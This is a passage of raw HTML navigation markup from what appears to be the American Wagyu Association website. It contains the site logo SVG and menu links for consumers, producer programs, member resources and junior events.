					<a href="/" class="logo mobile"><svg width="220" height="101" viewBox="0 0 220 101" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path id="a" d="M0 100.494h219.542V.147H0z"/></defs><g fill="none" fill-rule="evenodd"><path d="M27.605 92.95l-3.593 7.94h.913l.935-2.083h4.29l.924 2.084h.958l-3.593-7.94h-.834zm.406 1.036l1.79 4.009h-3.593l1.803-4.01zm12.222-.98l-2.871 4.302-2.873-4.302h-.9v7.885h.866v-6.376l2.873 4.212h.044l2.873-4.223v6.387h.89v-7.885zm3.134 0v7.885h5.755v-.812h-4.866V97.32h4.303v-.811h-4.303v-2.692h4.81v-.811z" fill="#FEFEFE"/><g transform="translate(0 .532)"><path d="M54.227 96.495c1.182 0 2.026-.608 2.026-1.622v-.022c0-.968-.742-1.554-2.015-1.554h-2.433v3.198h2.422zm-3.312-4.02h3.39c.969 0 1.746.293 2.242.788.382.383.608.935.608 1.554v.023c0 1.306-.902 2.072-2.14 2.297l2.421 3.221h-1.092l-2.286-3.063h-2.253v3.063h-.89v-7.884z" fill="#FEFEFE"/><mask id="b" fill="#fff"><use xlink:href="#a"/></mask><path fill="#FEFEFE" mask="url(#b)" d="M59.139 100.358h.89v-7.884h-.89zm2.851-3.919v-.022c0-2.23 1.666-4.078 3.986-4.078 1.43 0 2.286.507 3.075 1.25l-.608.654c-.665-.63-1.408-1.082-2.479-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.318 3.255 3.051 3.255 1.082 0 1.792-.418 2.547-1.138l.585.574c-.822.833-1.723 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m13.776 1.025l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.983.056h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zm11.671 0h.97l2.252 6.566 2.162-6.588h.732l2.162 6.588 2.253-6.566h.935l-2.816 7.94h-.755l-2.162-6.396-2.174 6.396h-.743zm17.179 4.99l-1.79-4.01-1.803 4.01h3.593zm-2.196-5.046h.833l3.593 7.94h-.957l-.924-2.083h-4.291l-.935 2.084h-.912l3.593-7.94zm5.172 4.021v-.022c0-2.163 1.588-4.078 3.952-4.078 1.33 0 2.151.383 2.94 1.048l-.574.675c-.609-.528-1.284-.9-2.4-.9-1.745 0-2.995 1.476-2.995 3.232v.023c0 1.88 1.205 3.277 3.12 3.277.9 0 1.734-.35 2.275-.789v-1.96h-2.4v-.799h3.255v3.142a4.777 4.777 0 01-3.164 1.206c-2.478 0-4.01-1.803-4.01-4.055m11.311.8l-3.277-4.765h1.081l2.658 3.942 2.68-3.942h1.036l-3.277 4.753v3.132h-.9zm5.476-.181v-4.584h.89v4.528c0 1.7.911 2.658 2.41 2.658 1.452 0 2.376-.878 2.376-2.602v-4.584h.89v4.516c0 2.298-1.318 3.492-3.29 3.492-1.947 0-3.276-1.194-3.276-3.424m17.166.406l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.308 6.792l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.393-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.275-.857-1.025 0-1.679.564-1.679 1.274v.022c0 .743.406 1.16 2.141 1.532 1.757.382 2.567 1.024 2.567 2.229v.022c0 1.352-1.125 2.231-2.691 2.231-1.251 0-2.275-.417-3.221-1.262m7.098.001l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.394-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.276-.857-1.024 0-1.678.564-1.678 1.274v.022c0 .743.406 1.16 2.14 1.532 1.757.382 2.568 1.024 2.568 2.229v.022c0 1.352-1.126 2.231-2.691 2.231-1.251 0-2.275-.417-3.222-1.262m14.497-2.77v-.022c0-1.792-1.306-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 3.255s3.086-1.442 3.086-3.233m-7.117 0v-.022c0-2.174 1.633-4.078 4.03-4.078 2.4 0 4.01 1.881 4.01 4.055v.023c0 2.173-1.633 4.077-4.032 4.077-2.398 0-4.008-1.881-4.008-4.055m9.575 0v-.022c0-2.23 1.667-4.078 3.987-4.078 1.43 0 2.286.507 3.074 1.25l-.608.654c-.664-.63-1.407-1.082-2.478-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.317 3.255 3.051 3.255 1.082 0 1.791-.418 2.546-1.138l.586.574c-.823.833-1.724 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m8.742 3.919h.89v-7.884h-.89zm8.312-2.894l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm7.054.879h-2.647v-.823h6.194v.823h-2.647v7.061h-.9zm5.294 7.061h.89v-7.884h-.89zm9.969-3.919v-.022c0-1.792-1.307-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 3.255s3.086-1.442 3.086-3.233m-7.118 0v-.022c0-2.174 1.633-4.078 4.032-4.078s4.01 1.881 4.01 4.055v.023c0 2.173-1.634 4.077-4.033 4.077-2.398 0-4.009-1.881-4.009-4.055m9.925-3.965h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zM15.032 46.452c2.036-5.17 5.678-2.612 5.678-2.612 9.666 7.315 7.057 38.83 7.057 38.83l15.815-37.652h.98l12.99 37.652L71.93 45.018h1.085l-14.92 39.063h-1.03L44.073 46.429 28.2 84.08h-1.084c.761-39.82-8.614-39.211-8.614-39.211-1.583-.183-3.47 1.582-3.47 1.582"/><path d="M18.521 45.887c-.717-.24-1.889.417-2.794 1.309l-3.02 3.141 1.377-4.259c1.266-3.214 3.183-3.89 4.568-3.89 1.438 0 2.525.735 2.644.819 7.488 5.666 8.028 24.306 7.776 33.928L42.905 44h2.382l12.314 35.688L71.23 44h3.264L58.796 85.1h-2.458l-12.36-35.824L28.876 85.1h-2.798l.02-1.039c.716-37.464-7.493-38.17-7.577-38.174M12.16 14.282s-.936.263-3.104 1.282c0 0-7.662-4.717-2.693-15.417 0 0-1.589 8.274 5.796 14.135m12.153 5.206s-.354.406-1.943 2.95c0 0 9.63 3.008 18.176-1.834 0 0-12.804 1.71-16.233-1.116" fill="#FEFEFE" mask="url(#b)"/><path d="M48.194 26.188s-7.164 13.689 24.36.777c0 0 23.798-9.443 35.28.176-1.32-1.106 16.913 12.568-7.758 33.67 0 0 16.137-17.998 6.514-29.23 0 0-6.589-10.604-32.453-1.85 0 0-18.34 8.094-27.65 5.145 0 0-8.378-3.723 1.707-8.688" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M99.488 68.78L88.907 45.995 78.383 68.78l-.38.813-6.729 14.487h-1.14l18.013-39.063h1.519L107.68 84.08h-1.194l-6.674-14.487z"/><path fill="#FEFEFE" mask="url(#b)" d="M89.104 44h1.214l18.954 41.1h-3.438l-6.947-15.08-.345-.862-9.633-20.74-9.983 21.607L71.924 85.1h-3.38L87.496 44h1.21m49.737 21.56h5.773v13.963c-1.883 1.593-4.029 2.821-6.44 3.69-2.408.868-4.971 1.301-7.69 1.301-3.077 0-5.922-.533-8.53-1.6-2.607-1.067-4.854-2.576-6.738-4.53a20.293 20.293 0 01-4.182-6.24c-1.015-2.35-1.52-4.882-1.52-7.595 0-2.821.54-5.443 1.626-7.867a19.997 19.997 0 014.422-6.32c1.86-1.791 4.067-3.201 6.617-4.233 2.551-1.03 5.29-1.546 8.22-1.546 2.604 0 5.064.408 7.38 1.221a22.49 22.49 0 016.29 3.391l-.16 1.085a19.903 19.903 0 00-6.103-3.5c-2.261-.812-4.694-1.22-7.299-1.22-2.784 0-5.39.488-7.812 1.465-2.423.976-4.53 2.325-6.321 4.042a19.027 19.027 0 00-4.231 6.048c-1.03 2.316-1.547 4.811-1.547 7.488 0 2.677.506 5.174 1.52 7.486a18.356 18.356 0 004.205 6.023c1.79 1.701 3.896 3.04 6.32 4.016 2.422.976 5.028 1.465 7.813 1.465 2.529 0 4.91-.408 7.135-1.22 2.223-.816 4.203-1.962 5.94-3.446V66.618h-4.688"/><path d="M130.086 85.533c-3.2 0-6.199-.564-8.916-1.676-2.727-1.117-5.112-2.72-7.085-4.766a21.38 21.38 0 01-4.383-6.543c-1.066-2.463-1.605-5.155-1.605-8 0-2.956.577-5.743 1.716-8.283a21.083 21.083 0 014.645-6.637c1.945-1.872 4.28-3.366 6.941-4.443 2.661-1.075 5.555-1.62 8.602-1.62 2.706 0 5.303.43 7.717 1.278a23.616 23.616 0 016.575 3.545l.474.364-.514 3.479-1.396-1.17a19.01 19.01 0 00-5.795-3.322c-2.142-.77-4.481-1.16-6.953-1.16-2.642 0-5.142.467-7.43 1.39-2.291.924-4.308 2.213-5.998 3.833a18.096 18.096 0 00-4.007 5.729c-.966 2.175-1.457 4.555-1.457 7.072 0 2.526.483 4.908 1.434 7.078a17.435 17.435 0 003.973 5.693c1.69 1.605 3.708 2.886 6 3.81 2.291.922 4.791 1.39 7.432 1.39 2.399 0 4.682-.39 6.786-1.159a18.422 18.422 0 005.27-2.966V67.637h-3.668V64.54h6.79v15.455l-.36.305c-1.966 1.662-4.238 2.964-6.754 3.87-2.505.904-5.209 1.362-8.034 1.362m33.811-22.882v21.43h-1.083V62.65l-14.65-17.632h1.302l13.888 16.71 13.943-16.71h1.25z" fill="#FEFEFE" mask="url(#b)"/><path fill="#FEFEFE" mask="url(#b)" d="M164.916 85.1h-3.12V63.017l-15.803-19.019h3.95l13.414 16.137L176.82 44h3.897l-15.801 19.019zm52.439-9.944a14.992 14.992 0 01-3.234 4.8c-1.45 1.411-3.17 2.524-5.163 3.337-1.992.816-4.131 1.221-6.414 1.221-2.39 0-4.59-.424-6.603-1.274a15.922 15.922 0 01-5.244-3.553 15.46 15.46 0 01-3.07-4.72c-.745-1.773-1.115-3.69-1.115-5.753V45.018h1.088v24.196c0 2.026.387 3.917 1.166 5.671a14.19 14.19 0 003.173 4.557c1.337 1.284 2.91 2.297 4.72 3.038 1.808.742 3.761 1.113 5.859 1.113 2.096 0 4.059-.371 5.887-1.113 1.827-.74 3.408-1.754 4.747-3.038a13.874 13.874 0 003.145-4.557c.762-1.754 1.142-3.645 1.142-5.67V45.017h1.084v24.196c0 2.136-.39 4.116-1.168 5.942"/><path d="M202.544 85.533c-2.515 0-4.87-.456-7-1.355a16.978 16.978 0 01-5.576-3.78 16.596 16.596 0 01-3.281-5.04c-.792-1.884-1.193-3.953-1.193-6.144V44h3.124v25.214c0 1.876.362 3.646 1.078 5.257a13.25 13.25 0 002.948 4.236c1.24 1.19 2.72 2.144 4.4 2.83 1.678.689 3.519 1.038 5.474 1.038 1.954 0 3.806-.35 5.505-1.04 1.695-.686 3.184-1.638 4.423-2.828a12.921 12.921 0 002.916-4.226c.703-1.616 1.059-3.388 1.059-5.267V44h3.12v25.214c0 2.26-.42 4.394-1.25 6.34a16.08 16.08 0 01-3.452 5.125c-1.549 1.506-3.396 2.7-5.496 3.557-2.104.86-4.39 1.297-6.799 1.297M91.547 70.776a2.802 2.802 0 11-5.603 0 2.802 2.802 0 015.603 0" fill="#FEFEFE" mask="url(#b)"/><path d="M88.746 68.993c-.983 0-1.782.8-1.782 1.783 0 .983.8 1.783 1.782 1.783.983 0 1.783-.8 1.783-1.783 0-.983-.8-1.783-1.783-1.783m0 5.603a3.823 3.823 0 01-3.819-3.82 3.824 3.824 0 013.82-3.82 3.824 3.824 0 013.819 3.82 3.823 3.823 0 01-3.82 3.82M10.779 16.645s-5.457.557-6.793 5.235c0 0-1.282 3.898.5 6.626 0 0 .613.668-.11 2.228 0 0-7.463 14.256-2.897 17.82 0 0 5.847 5.178 14.368-7.908 0 0-7.908 8.465-12.641 5.513 0 0-3.286-.835 3.118-13.254 0 0 2.45-4.565 0-6.849 0 0-3.063-3.286 4.455-9.41" fill="#FEFEFE" mask="url(#b)"/></g></g></svg></a>
					<a href="#" class="search-icon search-icon-mobile toggle-search"><svg width="17" height="17" viewBox="0 0 17 17" xmlns="http://www.w3.org/2000/svg" aria-hidden="true"><path d="M6.837 12.674a5.735 5.735 0 003.727-1.359l4.53 4.53a.52.52 0 00.376.155.532.532 0 00.375-.906l-4.53-4.53a5.83 5.83 0 001.359-3.727A5.838 5.838 0 006.837 1C3.627 1 1 3.627 1 6.837a5.846 5.846 0 005.837 5.837zm.11-10.64a4.92 4.92 0 014.915 4.914 4.911 4.911 0 01-4.914 4.914 4.92 4.92 0 01-4.914-4.914 4.927 4.927 0 014.914-4.914z" fill="#FFF" stroke="#FFF" fill-rule="evenodd"/></svg></a>
					<a href="#" class="toggle menu" title="Toggle the Main Navigation">
						<svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M436 124H12c-6.627 0-12-5.373-12-12V80c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12zm0 160H12c-6.627 0-12-5.373-12-12v-32c0-6.627 5.373-12 12-12h424c6.627 0 12 5.373 12 12v32c0 6.627-5.373 12-12 12z"/>
</svg>
					</a>
					<div class="site-menu">
 <ul>
 <li class="left-side has-children">
 <a class="carrot" href="/for-consumers">Consumers</a>
 
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu" id="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 2">
 <li>
 <a href="/for-consumers/why-should-you-eat-wagyu">Why Should You Eat Wagyu?</a>
 </li>
 <li>
 <a href="/for-consumers/where-to-buy-wagyu-beef">Where To Buy Wagyu Beef</a>
 </li>
 <li>
 <a href="https://wagyu.org/news"
 target="">AWA News</a>
 </li>
 <li>
 <a href="https://wagyu.org/company/membership-application"
 target="">Become a Member</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-consumers/what-is-wagyu-beef"
 target="_blank">Breed History</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-producers/request-newsletter"
 target="">Request Newsletter</a>
 </li>
 <li>
 <a href="/for-consumers/wagyu-beef-recipes">Wagyu Beef Recipes</a>
 </li>
 <li>
 <a href="/for-consumers/what-is-wagyu-beef">What Is Wagyu Beef</a>
 </li>
 </ul>
 <div class="featured-content">
 <a href="https://wagyu.org/for-consumers/where-to-buy-wagyu-beef" class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/18978/Wagyu-Trail-960x720.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/18978/Wagyu-Trail-960x720.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/Wagyu-Trail-960x720.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/Wagyu-Trail-960x720.jpg 640w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_fit_center-center_none/Wagyu-Trail-960x720.jpg" width="333" height="250" alt="Wagyu Trail 960x720" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Where to buy Wagyu Beef. Taste Excellence!</p>
 </div>
 
 </a>
 </div>
 
 </div>
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li class="left-side has-children">
 <a class="carrot" href="/for-producers">Programs</a>
 
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu" id="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 1">
 <li>
 <a href="/for-producers/authentic-wagyu-pvp">Authentic Wagyu Programs</a>
 </li>
 <li>
 <a href="/for-producers/awa-member-programs">Registered Bull Fertility Testing</a>
 </li>
 <li>
 <a href="/for-producers/awa-carcass-research-program">AWA Carcass Research Program</a>
 </li>
 <li>
 <a href="/for-producers/awa-progeny-test">AWA Progeny Test</a>
 </li>
 </ul>
 <div class="featured-content">
 <a href="https://wagyu.org/news/where-to-buy" class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/75227/photocontest-49.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/75227/photocontest-49.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/photocontest-49.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/photocontest-49.jpg 640w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_fit_center-center_none/photocontest-49.jpg" width="375" height="250" alt="Photocontest 49" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Where to find great Wagyu genetics.</p>
 </div>
 
 </a>
 </div>
 
 </div>
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li class="left-side has-children">
 <a class="carrot" href="/for-members">Member Tools/ Resources</a>
 
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu" id="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 2">
 <li>
 <a href="/for-members/registration">Animal Registration</a>
 </li>
 <li>
 <a href="https://wagyu.org/for-consumers/become-a-member"
 target="">Become a Member</a>
 </li>
 <li>
 <a href="/for-members/digital-beef-tutorials">Digital Beef- Tutorials</a>
 </li>
 <li>
 <a href="/for-members/2025-educational-webinar-series">Educational Webinar Series</a>
 </li>
 <li>
 <a href="https://wagyu.org/company/advertise-with-the-awa"
 target="">Fee Schedule/ Media Guide</a>
 </li>
 <li>
 <a href="https://wagyu.digitalbeef.com/"
 target="_blank">Genetics / Breeders Search</a>
 </li>
 <li>
 <a href="/for-members/genetic-evaluations">Genetic Evaluations</a>
 </li>
 <li>
 <a href="/for-members/performance-guidelines">Performance Guidelines</a>
 </li>
 <li>
 <a href="https://wagyu.org/news/where-to-buy"
 target="">Premium Advertisers</a>
 </li>
 <li>
 <a href="/for-members/resources-and-forms">Resources and Education</a>
 </li>
 </ul>
 <div class="featured-content">
 <a href="https://wagyu.org/company/membership-application" class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/75183/DSC_1920.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/75183/DSC_1920.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/DSC_1920.JPG 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/DSC_1920.JPG 640w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_fit_center-center_none/DSC_1920.JPG" width="443" height="250" alt="DSC 1920" loading="lazy" />
		
	</picture>


 </div>
 <div class="content">
 <p>Don&#039;t forget to renew your membership!</p>
 </div>
 
 </a>
 </div>
 
 </div>
 <div class="featured-event">
 <div class="event-info">
 <header class="title">2025 AGM &; Conference!</header>
 <div class="location">Sep 18
 - Sep 21
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/events/2025-agm-conference"
 target="">Read More!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 <li class="left-side has-children">
 <a class="carrot" href="/for-juniors">Juniors</a>
 
 <a href="#" class="toggle child" style="border: none;"
 aria-label="Toggle Child Menu"><svg width="21" height="24" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
	<path d="M441.9 167.3l-19.8-19.8c-4.7-4.7-12.3-4.7-17 0L224 328.2 42.9 147.5c-4.7-4.7-12.3-4.7-17 0L6.1 167.3c-4.7 4.7-4.7 12.3 0 17l209.4 209.4c4.7 4.7 12.3 4.7 17 0l209.4-209.4c4.7-4.7 4.7-12.3 0-17z"/>
</svg></a>

 <div class="child-menu" id="child-menu">
 <div class="wrapper">
 <div class="inner">
 <ul style="column-count: 1">
 <li>
 <a href="/for-juniors/junior-events">2025 Junior Wagyu Camp- WTAMU</a>
 </li>
 <li>
 <a href="/for-juniors/junior-scholarship">2025 NJWA Scholarship/ Internship</a>
 </li>
 <li>
 <a href="/for-juniors/national-junior-wagyu-association-point-system">2024 Junior Wagyu High-Point</a>
 </li>
 <li>
 <a href="https://wagyu.org/company/membership-application"
 target="">Become A Junior Member</a>
 </li>
 <li>
 <a href="/for-juniors/junior-sponsorship-opportunities">Junior Sponsorship Opportunities</a>
 </li>
 <li>
 <a href="/for-juniors/junior-spotlight-2">Junior Spotlight</a>
 </li>
 </ul>
 <div class="featured-content">
 <div class="row">
 
 <div class="image">
 	<picture class="aspect widescreen">
					<source srcset="				https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/74809/Image-11.webp 320w,
							https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/74809/Image-11.webp 640w,
			" type="image/webp" />
				<source srcset="			https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_320x175_fit_center-center_none/Image-11.jpg 320w,
					https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_640x350_fit_center-center_none/Image-11.jpg 640w,
		" type="image/jpeg" />
		<img src="https://s3.us-east-1.amazonaws.com/assets.wagyu.org/_460x250_fit_center-center_none/Image-11.jpg" width="333" height="250" alt="Image 11" loading="lazy" />
		
	</picture>


 </div>
 
 </div>
 </div>
 
 </div>
 <div class="featured-event">
 <div class="event-info">
 <header class="title">Sign up for Junior Wagyu Camp!</header>
 <div class="location">Jun 26
 - Jun 28
 @ 11:34 pm MDT
 </div>
 </div>
 <div class="btn-container">
 <a class="rd-button" href="https://wagyu.org/for-juniors/junior-events"
 target="">Sign up!</a>
 </div>
 </div>
 </div>
 </div>
 </li>
 
 <span class="logo-wrapper">
 <a href="/" class="logo"><svg width="220" height="101" viewBox="0 0 220 101" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true"><defs><path id="a" d="M0 100.494h219.542V.147H0z"/></defs><g fill="none" fill-rule="evenodd"><path d="M27.605 92.95l-3.593 7.94h.913l.935-2.083h4.29l.924 2.084h.958l-3.593-7.94h-.834zm.406 1.036l1.79 4.009h-3.593l1.803-4.01zm12.222-.98l-2.871 4.302-2.873-4.302h-.9v7.885h.866v-6.376l2.873 4.212h.044l2.873-4.223v6.387h.89v-7.885zm3.134 0v7.885h5.755v-.812h-4.866V97.32h4.303v-.811h-4.303v-2.692h4.81v-.811z" fill="#FEFEFE"/><g transform="translate(0 .532)"><path d="M54.227 96.495c1.182 0 2.026-.608 2.026-1.622v-.022c0-.968-.742-1.554-2.015-1.554h-2.433v3.198h2.422zm-3.312-4.02h3.39c.969 0 1.746.293 2.242.788.382.383.608.935.608 1.554v.023c0 1.306-.902 2.072-2.14 2.297l2.421 3.221h-1.092l-2.286-3.063h-2.253v3.063h-.89v-7.884z" fill="#FEFEFE"/><mask id="b" fill="#fff"><use xlink:href="#a"/></mask><path fill="#FEFEFE" mask="url(#b)" d="M59.139 100.358h.89v-7.884h-.89zm2.851-3.919v-.022c0-2.23 1.666-4.078 3.986-4.078 1.43 0 2.286.507 3.075 1.25l-.608.654c-.665-.63-1.408-1.082-2.479-1.082-1.745 0-3.051 1.42-3.051 3.233v.023c0 1.823 1.318 3.255 3.051 3.255 1.082 0 1.792-.418 2.547-1.138l.585.574c-.822.833-1.723 1.386-3.154 1.386-2.274 0-3.953-1.791-3.953-4.055m13.776 1.025l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.983.056h.833l4.967 6.319v-6.319h.867v7.884h-.71l-5.09-6.465v6.465h-.867zm11.671 0h.97l2.252 6.566 2.162-6.588h.732l2.162 6.588 2.253-6.566h.935l-2.816 7.94h-.755l-2.162-6.396-2.174 6.396h-.743zm17.179 4.99l-1.79-4.01-1.803 4.01h3.593zm-2.196-5.046h.833l3.593 7.94h-.957l-.924-2.083h-4.291l-.935 2.084h-.912l3.593-7.94zm5.172 4.021v-.022c0-2.163 1.588-4.078 3.952-4.078 1.33 0 2.151.383 2.94 1.048l-.574.675c-.609-.528-1.284-.9-2.4-.9-1.745 0-2.995 1.476-2.995 3.232v.023c0 1.88 1.205 3.277 3.12 3.277.9 0 1.734-.35 2.275-.789v-1.96h-2.4v-.799h3.255v3.142a4.777 4.777 0 01-3.164 1.206c-2.478 0-4.01-1.803-4.01-4.055m11.311.8l-3.277-4.765h1.081l2.658 3.942 2.68-3.942h1.036l-3.277 4.753v3.132h-.9zm5.476-.181v-4.584h.89v4.528c0 1.7.911 2.658 2.41 2.658 1.452 0 2.376-.878 2.376-2.602v-4.584h.89v4.516c0 2.298-1.318 3.492-3.29 3.492-1.947 0-3.276-1.194-3.276-3.424m17.166.406l-1.79-4.01-1.802 4.01h3.592zm-2.196-5.046h.834l3.592 7.94h-.957l-.923-2.083h-4.291l-.935 2.084h-.912l3.592-7.94zm5.308 6.792l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.393-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.275-.857-1.025 0-1.679.564-1.679 1.274v.022c0 .743.406 1.16 2.141 1.532 1.757.382 2.567 1.024 2.567 2.229v.022c0 1.352-1.125 2.231-2.691 2.231-1.251 0-2.275-.417-3.221-1.262m7.098.001l.55-.654c.823.744 1.612 1.116 2.705 1.116 1.058 0 1.756-.564 1.756-1.341v-.023c0-.732-.394-1.149-2.05-1.497-1.813-.394-2.646-.98-2.646-2.276v-.022c0-1.239 1.092-2.151 2.59-2.151 1.15 0 1.971.326 2.77.969l-.517.687c-.732-.597-1.465-.857-2.276-.857-1.024 0-1.678.564-1.678 1.274v.022c0 .743.406 1.16 2.14 1.532 1.757.382 2.568 1.024 2.568 2.229v.022c0 1.352-1.126 2.231-2.691 2.231-1.251 0-2.275-.417-3.222-1.262m14.497-2.77v-.022c0-1.792-1.306-3.256-3.109-3.256-1.801 0-3.085 1.442-3.085 3.233v.023c0 1.79 1.306 3.255 3.108 3.255s3.086-1.442 3.086-3.233m-7.117 0v-.022c0-2.174 1.633-4.078 4.03-4.078 2.4 0 4.01 1.881 4.01 4.055v.023c0 2.173-1.633 4.077-4.032 4.077-2.398 0-4.008-1.881-4.008-4.055m9.575 0v-.022c0-2.23 1.667-4.078 3.987-4.078 1.43 0 2.286.507 3.074 